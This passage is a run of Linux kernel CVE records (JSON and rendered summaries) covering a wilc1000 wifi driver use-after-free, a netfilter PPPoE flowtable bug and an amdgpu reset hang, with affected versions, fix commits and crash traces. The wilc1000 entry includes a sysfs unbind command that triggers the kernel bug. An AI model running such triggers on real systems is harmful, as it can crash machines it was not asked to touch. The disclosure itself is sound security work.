              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.214",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: wilc1000: prevent use-after-free on vif when cleaning up all interfaces\n\nwilc_netdev_cleanup currently triggers a KASAN warning, which can be\nobserved on interface registration error path, or simply by\nremoving the module/unbinding device from driver:\n\necho spi0.1 \u003e /sys/bus/spi/drivers/wilc1000_spi/unbind\n\n==================================================================\nBUG: KASAN: slab-use-after-free in wilc_netdev_cleanup+0x508/0x5cc\nRead of size 4 at addr c54d1ce8 by task sh/86\n\nCPU: 0 PID: 86 Comm: sh Not tainted 6.8.0-rc1+ #117\nHardware name: Atmel SAMA5\n unwind_backtrace from show_stack+0x18/0x1c\n show_stack from dump_stack_lvl+0x34/0x58\n dump_stack_lvl from print_report+0x154/0x500\n print_report from kasan_report+0xac/0xd8\n kasan_report from wilc_netdev_cleanup+0x508/0x5cc\n wilc_netdev_cleanup from wilc_bus_remove+0xc8/0xec\n wilc_bus_remove from spi_remove+0x8c/0xac\n spi_remove from device_release_driver_internal+0x434/0x5f8\n device_release_driver_internal from unbind_store+0xbc/0x108\n unbind_store from kernfs_fop_write_iter+0x398/0x584\n kernfs_fop_write_iter from vfs_write+0x728/0xf88\n vfs_write from ksys_write+0x110/0x1e4\n ksys_write from ret_fast_syscall+0x0/0x1c\n\n[...]\n\nAllocated by task 1:\n kasan_save_track+0x30/0x5c\n __kasan_kmalloc+0x8c/0x94\n __kmalloc_node+0x1cc/0x3e4\n kvmalloc_node+0x48/0x180\n alloc_netdev_mqs+0x68/0x11dc\n alloc_etherdev_mqs+0x28/0x34\n wilc_netdev_ifc_init+0x34/0x8ec\n wilc_cfg80211_init+0x690/0x910\n wilc_bus_probe+0xe0/0x4a0\n spi_probe+0x158/0x1b0\n really_probe+0x270/0xdf4\n __driver_probe_device+0x1dc/0x580\n driver_probe_device+0x60/0x140\n __driver_attach+0x228/0x5d4\n bus_for_each_dev+0x13c/0x1a8\n bus_add_driver+0x2a0/0x608\n driver_register+0x24c/0x578\n do_one_initcall+0x180/0x310\n kernel_init_freeable+0x424/0x484\n kernel_init+0x20/0x148\n ret_from_fork+0x14/0x28\n\nFreed by task 86:\n kasan_save_track+0x30/0x5c\n kasan_save_free_info+0x38/0x58\n __kasan_slab_free+0xe4/0x140\n kfree+0xb0/0x238\n device_release+0xc0/0x2a8\n kobject_put+0x1d4/0x46c\n netdev_run_todo+0x8fc/0x11d0\n wilc_netdev_cleanup+0x1e4/0x5cc\n wilc_bus_remove+0xc8/0xec\n spi_remove+0x8c/0xac\n device_release_driver_internal+0x434/0x5f8\n unbind_store+0xbc/0x108\n kernfs_fop_write_iter+0x398/0x584\n vfs_write+0x728/0xf88\n ksys_write+0x110/0x1e4\n ret_fast_syscall+0x0/0x1c\n [...]\n\nDavid Mosberger-Tan initial investigation [1] showed that this\nuse-after-free is due to netdevice unregistration during vif list\ntraversal. When unregistering a net device, since the needs_free_netdev has\nbeen set to true during registration, the netdevice object is also freed,\nand as a consequence, the corresponding vif object too, since it is\nattached to it as private netdevice data. The next occurrence of the loop\nthen tries to access freed vif pointer to the list to move forward in the\nlist.\n\nFix this use-after-free thanks to two mechanisms:\n- navigate in the list with list_for_each_entry_safe, which allows to\n  safely modify the list as we go through each element. For each element,\n  remove it from the list with list_del_rcu\n- make sure to wait for RCU grace period end after each vif removal to make\n  sure it is safe to free the corresponding vif too (through\n  unregister_netdev)\n\nSince we are in a RCU \"modifier\" path (not a \"reader\" path), and because\nsuch path is expected not to be concurrent to any other modifier (we are\nusing the vif_mutex lock), we do not need to use RCU list API, that\u0027s why\nwe can benefit from list_for_each_entry_safe.\n\n[1] https://lore.kernel.org/linux-wireless/ab077dbe58b1ea5de0a3b2ca21f275a07af967d2.camel@egauge.net/"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:59:06.398Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/5956f4203b6cdd0755bbdd21b45f3933c7026208"
        },
        {
          "url": "https://git.kernel.org/stable/c/fe20e3d56bc911408fc3c27a17c59e9d7885f7d1"
        },
        {
          "url": "https://git.kernel.org/stable/c/a9545af2a533739ffb64d6c9a6fec6f13e2b505f"
        },
        {
          "url": "https://git.kernel.org/stable/c/3da9d32b7f4a1a9f7e4bb15bb82f2b2dd6719447"
        },
        {
          "url": "https://git.kernel.org/stable/c/24228dcf1d30c2231caa332be7d3090ac59fbfe9"
        },
        {
          "url": "https://git.kernel.org/stable/c/73a2aa0aef86c2c07be5a2f42c9e6047e1a2f7bb"
        },
        {
          "url": "https://git.kernel.org/stable/c/cb5942b77c05d54310a0420cac12935e9b6aa21c"
        }
      ],
      "title": "wifi: wilc1000: prevent use-after-free on vif when cleaning up all interfaces",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26895",
    "datePublished": "2024-04-17T10:27:46.585Z",
    "dateReserved": "2024-02-19T14:20:24.186Z",
    "dateUpdated": "2025-05-04T08:59:06.398Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27015 (GCVE-0-2024-27015)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:29 – Updated: 2025-11-04 17:17

Title

netfilter: flowtable: incorrect pppoe tuple

Summary

In the Linux kernel, the following vulnerability has been resolved: netfilter: flowtable: incorrect pppoe tuple pppoe traffic reaching ingress path does not match the flowtable entry because the pppoe header is expected to be at the network header offset. This bug causes a mismatch in the flow table lookup, so pppoe packets enter the classical forwarding path.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e719b52d0c56989b0…
	https://git.kernel.org/stable/c/f1c3c61701a0b12f4…
	https://git.kernel.org/stable/c/4ed82dd368ad883dc…
	https://git.kernel.org/stable/c/e3f078103421642fc…
	https://git.kernel.org/stable/c/6db5dc7b351b95699…

Impacted products

Vendor

Product

Version

Linux

Affected: 72efd585f7144a047f7da63864284764596ccad9 , < e719b52d0c56989b0f3475a03a6d64f182c85b56 (git)
Affected: 72efd585f7144a047f7da63864284764596ccad9 , < f1c3c61701a0b12f4906152c1626a5de580ea3d2 (git)
Affected: 72efd585f7144a047f7da63864284764596ccad9 , < 4ed82dd368ad883dc4284292937b882f044e625d (git)
Affected: 72efd585f7144a047f7da63864284764596ccad9 , < e3f078103421642fcd5f05c5e70777feb10f000d (git)
Affected: 72efd585f7144a047f7da63864284764596ccad9 , < 6db5dc7b351b9569940cd1cf445e237c42cd6d27 (git)

Linux

Affected: 5.13
Unaffected: 0 , < 5.13 (semver)
Unaffected: 5.15.157 , ≤ 5.15.* (semver)
Unaffected: 6.1.88 , ≤ 6.1.* (semver)
Unaffected: 6.6.29 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27015",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-14T18:55:50.907431Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-14T18:55:59.147Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:17:15.835Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e719b52d0c56989b0f3475a03a6d64f182c85b56"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f1c3c61701a0b12f4906152c1626a5de580ea3d2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4ed82dd368ad883dc4284292937b882f044e625d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e3f078103421642fcd5f05c5e70777feb10f000d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6db5dc7b351b9569940cd1cf445e237c42cd6d27"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_flow_table_ip.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e719b52d0c56989b0f3475a03a6d64f182c85b56",
              "status": "affected",
              "version": "72efd585f7144a047f7da63864284764596ccad9",
              "versionType": "git"
            },
            {
              "lessThan": "f1c3c61701a0b12f4906152c1626a5de580ea3d2",
              "status": "affected",
              "version": "72efd585f7144a047f7da63864284764596ccad9",
              "versionType": "git"
            },
            {
              "lessThan": "4ed82dd368ad883dc4284292937b882f044e625d",
              "status": "affected",
              "version": "72efd585f7144a047f7da63864284764596ccad9",
              "versionType": "git"
            },
            {
              "lessThan": "e3f078103421642fcd5f05c5e70777feb10f000d",
              "status": "affected",
              "version": "72efd585f7144a047f7da63864284764596ccad9",
              "versionType": "git"
            },
            {
              "lessThan": "6db5dc7b351b9569940cd1cf445e237c42cd6d27",
              "status": "affected",
              "version": "72efd585f7144a047f7da63864284764596ccad9",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_flow_table_ip.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.13"
            },
            {
              "lessThan": "5.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.157",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.88",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.157",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.88",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: flowtable: incorrect pppoe tuple\n\npppoe traffic reaching ingress path does not match the flowtable entry\nbecause the pppoe header is expected to be at the network header offset.\nThis bug causes a mismatch in the flow table lookup, so pppoe packets\nenter the classical forwarding path."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:02:13.091Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e719b52d0c56989b0f3475a03a6d64f182c85b56"
        },
        {
          "url": "https://git.kernel.org/stable/c/f1c3c61701a0b12f4906152c1626a5de580ea3d2"
        },
        {
          "url": "https://git.kernel.org/stable/c/4ed82dd368ad883dc4284292937b882f044e625d"
        },
        {
          "url": "https://git.kernel.org/stable/c/e3f078103421642fcd5f05c5e70777feb10f000d"
        },
        {
          "url": "https://git.kernel.org/stable/c/6db5dc7b351b9569940cd1cf445e237c42cd6d27"
        }
      ],
      "title": "netfilter: flowtable: incorrect pppoe tuple",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27015",
    "datePublished": "2024-05-01T05:29:52.281Z",
    "dateReserved": "2024-02-19T14:20:24.209Z",
    "dateUpdated": "2025-11-04T17:17:15.835Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35931 (GCVE-0-2024-35931)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2025-09-16 08:02

Title

drm/amdgpu: Skip do PCI error slot reset during RAS recovery

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Skip do PCI error slot reset during RAS recovery Why: The PCI error slot reset maybe triggered after inject ue to UMC multi times, this caused system hang. [ 557.371857] amdgpu 0000:af:00.0: amdgpu: GPU reset succeeded, trying to resume [ 557.373718] [drm] PCIE GART of 512M enabled. [ 557.373722] [drm] PTB located at 0x0000031FED700000 [ 557.373788] [drm] VRAM is lost due to GPU reset! [ 557.373789] [drm] PSP is resuming... [ 557.547012] mlx5_core 0000:55:00.0: mlx5_pci_err_detected Device state = 1 pci_status: 0. Exit, result = 3, need reset [ 557.547067] [drm] PCI error: detected callback, state(1)!! [ 557.547069] [drm] No support for XGMI hive yet... [ 557.548125] mlx5_core 0000:55:00.0: mlx5_pci_slot_reset Device state = 1 pci_status: 0. Enter [ 557.607763] mlx5_core 0000:55:00.0: wait vital counter value 0x16b5b after 1 iterations [ 557.607777] mlx5_core 0000:55:00.0: mlx5_pci_slot_reset Device state = 1 pci_status: 1. Exit, err = 0, result = 5, recovered [ 557.610492] [drm] PCI error: slot reset callback!! ... [ 560.689382] amdgpu 0000:3f:00.0: amdgpu: GPU reset(2) succeeded! [ 560.689546] amdgpu 0000:5a:00.0: amdgpu: GPU reset(2) succeeded! [ 560.689562] general protection fault, probably for non-canonical address 0x5f080b54534f611f: 0000 [#1] SMP NOPTI [ 560.701008] CPU: 16 PID: 2361 Comm: kworker/u448:9 Tainted: G OE 5.15.0-91-generic #101-Ubuntu [ 560.712057] Hardware name: Microsoft C278A/C278A, BIOS C2789.5.BS.1C11.AG.1 11/08/2023 [ 560.720959] Workqueue: amdgpu-reset-hive amdgpu_ras_do_recovery [amdgpu] [ 560.728887] RIP: 0010:amdgpu_device_gpu_recover.cold+0xbf1/0xcf5 [amdgpu] [ 560.736891] Code: ff 41 89 c6 e9 1b ff ff ff 44 0f b6 45 b0 e9 4f ff ff ff be 01 00 00 00 4c 89 e7 e8 76 c9 8b ff 44 0f b6 45 b0 e9 3c fd ff ff <48> 83 ba 18 02 00 00 00 0f 84 6a f8 ff ff 48 8d 7a 78 be 01 00 00 [ 560.757967] RSP: 0018:ffa0000032e53d80 EFLAGS: 00010202 [ 560.763848] RAX: ffa00000001dfd10 RBX: ffa0000000197090 RCX: ffa0000032e53db0 [ 560.771856] RDX: 5f080b54534f5f07 RSI: 0000000000000000 RDI: ff11000128100010 [ 560.779867] RBP: ffa0000032e53df0 R08: 0000000000000000 R09: ffffffffffe77f08 [ 560.787879] R10: 0000000000ffff0a R11: 0000000000000001 R12: 0000000000000000 [ 560.795889] R13: ffa0000032e53e00 R14: 0000000000000000 R15: 0000000000000000 [ 560.803889] FS: 0000000000000000(0000) GS:ff11007e7e800000(0000) knlGS:0000000000000000 [ 560.812973] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 560.819422] CR2: 000055a04c118e68 CR3: 0000000007410005 CR4: 0000000000771ee0 [ 560.827433] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 560.835433] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400 [ 560.843444] PKRU: 55555554 [ 560.846480] Call Trace: [ 560.849225] <TASK> [ 560.851580] ? show_trace_log_lvl+0x1d6/0x2ea [ 560.856488] ? show_trace_log_lvl+0x1d6/0x2ea [ 560.861379] ? amdgpu_ras_do_recovery+0x1b2/0x210 [amdgpu] [ 560.867778] ? show_regs.part.0+0x23/0x29 [ 560.872293] ? __die_body.cold+0x8/0xd [ 560.876502] ? die_addr+0x3e/0x60 [ 560.880238] ? exc_general_protection+0x1c5/0x410 [ 560.885532] ? asm_exc_general_protection+0x27/0x30 [ 560.891025] ? amdgpu_device_gpu_recover.cold+0xbf1/0xcf5 [amdgpu] [ 560.898323] amdgpu_ras_do_recovery+0x1b2/0x210 [amdgpu] [ 560.904520] process_one_work+0x228/0x3d0 How: In RAS recovery, mode-1 reset is issued from RAS fatal error handling and expected all the nodes in a hive to be reset. no need to issue another mode-1 during this procedure.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/395ca1031acf89d8e…
	https://git.kernel.org/stable/c/601429cca96b4af3b…

Impacted products

Vendor

Product

Version

Linux

Affected: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 , < 395ca1031acf89d8ecb26127c544a71688d96f35 (git)
Affected: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 , < 601429cca96b4af3be44172c3b64e4228515dbe1 (git)

Linux

Affected: 4.2
Unaffected: 0 , < 4.2 (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.006Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/395ca1031acf89d8ecb26127c544a71688d96f35"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/601429cca96b4af3be44172c3b64e4228515dbe1"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35931",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:41:01.828598Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:15.513Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/amdgpu_device.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "395ca1031acf89d8ecb26127c544a71688d96f35",
              "status": "affected",
              "version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
              "versionType": "git"
            },
            {
              "lessThan": "601429cca96b4af3be44172c3b64e4228515dbe1",
              "status": "affected",
              "version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/amdgpu_device.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.2"
            },
            {
              "lessThan": "4.2",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: Skip do PCI error slot reset during RAS recovery\n\nWhy:\n    The PCI error slot reset maybe triggered after inject ue to UMC multi times, this\n    caused system hang.\n    [  557.371857] amdgpu 0000:af:00.0: amdgpu: GPU reset succeeded, trying to resume\n    [  557.373718] [drm] PCIE GART of 512M enabled.\n    [  557.373722] [drm] PTB located at 0x0000031FED700000\n    [  557.373788] [drm] VRAM is lost due to GPU reset!\n    [  557.373789] [drm] PSP is resuming...\n    [  557.547012] mlx5_core 0000:55:00.0: mlx5_pci_err_detected Device state = 1 pci_status: 0. Exit, result = 3, need reset\n    [  557.547067] [drm] PCI error: detected callback, state(1)!!\n    [  557.547069] [drm] No support for XGMI hive yet...\n    [  557.548125] mlx5_core 0000:55:00.0: mlx5_pci_slot_reset Device state = 1 pci_status: 0. Enter\n    [  557.607763] mlx5_core 0000:55:00.0: wait vital counter value 0x16b5b after 1 iterations\n    [  557.607777] mlx5_core 0000:55:00.0: mlx5_pci_slot_reset Device state = 1 pci_status: 1. Exit, err = 0, result = 5, recovered\n    [  557.610492] [drm] PCI error: slot reset callback!!\n    ...\n    [  560.689382] amdgpu 0000:3f:00.0: amdgpu: GPU reset(2) succeeded!\n    [  560.689546] amdgpu 0000:5a:00.0: amdgpu: GPU reset(2) succeeded!\n    [  560.689562] general protection fault, probably for non-canonical address 0x5f080b54534f611f: 0000 [#1] SMP NOPTI\n    [  560.701008] CPU: 16 PID: 2361 Comm: kworker/u448:9 Tainted: G           OE     5.15.0-91-generic #101-Ubuntu\n    [  560.712057] Hardware name: Microsoft C278A/C278A, BIOS C2789.5.BS.1C11.AG.1 11/08/2023\n    [  560.720959] Workqueue: amdgpu-reset-hive amdgpu_ras_do_recovery [amdgpu]\n    [  560.728887] RIP: 0010:amdgpu_device_gpu_recover.cold+0xbf1/0xcf5 [amdgpu]\n    [  560.736891] Code: ff 41 89 c6 e9 1b ff ff ff 44 0f b6 45 b0 e9 4f ff ff ff be 01 00 00 00 4c 89 e7 e8 76 c9 8b ff 44 0f b6 45 b0 e9 3c fd ff ff \u003c48\u003e 83 ba 18 02 00 00 00 0f 84 6a f8 ff ff 48 8d 7a 78 be 01 00 00\n    [  560.757967] RSP: 0018:ffa0000032e53d80 EFLAGS: 00010202\n    [  560.763848] RAX: ffa00000001dfd10 RBX: ffa0000000197090 RCX: ffa0000032e53db0\n    [  560.771856] RDX: 5f080b54534f5f07 RSI: 0000000000000000 RDI: ff11000128100010\n    [  560.779867] RBP: ffa0000032e53df0 R08: 0000000000000000 R09: ffffffffffe77f08\n    [  560.787879] R10: 0000000000ffff0a R11: 0000000000000001 R12: 0000000000000000\n    [  560.795889] R13: ffa0000032e53e00 R14: 0000000000000000 R15: 0000000000000000\n    [  560.803889] FS:  0000000000000000(0000) GS:ff11007e7e800000(0000) knlGS:0000000000000000\n    [  560.812973] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n    [  560.819422] CR2: 000055a04c118e68 CR3: 0000000007410005 CR4: 0000000000771ee0\n    [  560.827433] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n    [  560.835433] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n    [  560.843444] PKRU: 55555554\n    [  560.846480] Call Trace:\n    [  560.849225]  \u003cTASK\u003e\n    [  560.851580]  ? show_trace_log_lvl+0x1d6/0x2ea\n    [  560.856488]  ? show_trace_log_lvl+0x1d6/0x2ea\n    [  560.861379]  ? amdgpu_ras_do_recovery+0x1b2/0x210 [amdgpu]\n    [  560.867778]  ? show_regs.part.0+0x23/0x29\n    [  560.872293]  ? __die_body.cold+0x8/0xd\n    [  560.876502]  ? die_addr+0x3e/0x60\n    [  560.880238]  ? exc_general_protection+0x1c5/0x410\n    [  560.885532]  ? asm_exc_general_protection+0x27/0x30\n    [  560.891025]  ? amdgpu_device_gpu_recover.cold+0xbf1/0xcf5 [amdgpu]\n    [  560.898323]  amdgpu_ras_do_recovery+0x1b2/0x210 [amdgpu]\n    [  560.904520]  process_one_work+0x228/0x3d0\nHow:\n    In RAS recovery, mode-1 reset is issued from RAS fatal error handling and expected\n    all the nodes in a hive to be reset. no need to issue another mode-1 during this procedure."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-16T08:02:34.965Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/395ca1031acf89d8ecb26127c544a71688d96f35"
        },
        {
          "url": "https://git.kernel.org/stable/c/601429cca96b4af3be44172c3b64e4228515dbe1"
        }
      ],
      "title": "drm/amdgpu: Skip do PCI error slot reset during RAS recovery",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35931",
    "datePublished": "2024-05-19T10:10:39.706Z",
    "dateReserved": "2024-05-17T13:50:33.129Z",
    "dateUpdated": "2025-09-16T08:02:34.965Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26603 (GCVE-0-2024-26603)

Vulnerability from cvelistv5 – Published: 2024-02-24 14:56 – Updated: 2025-11-04 18:29

Title

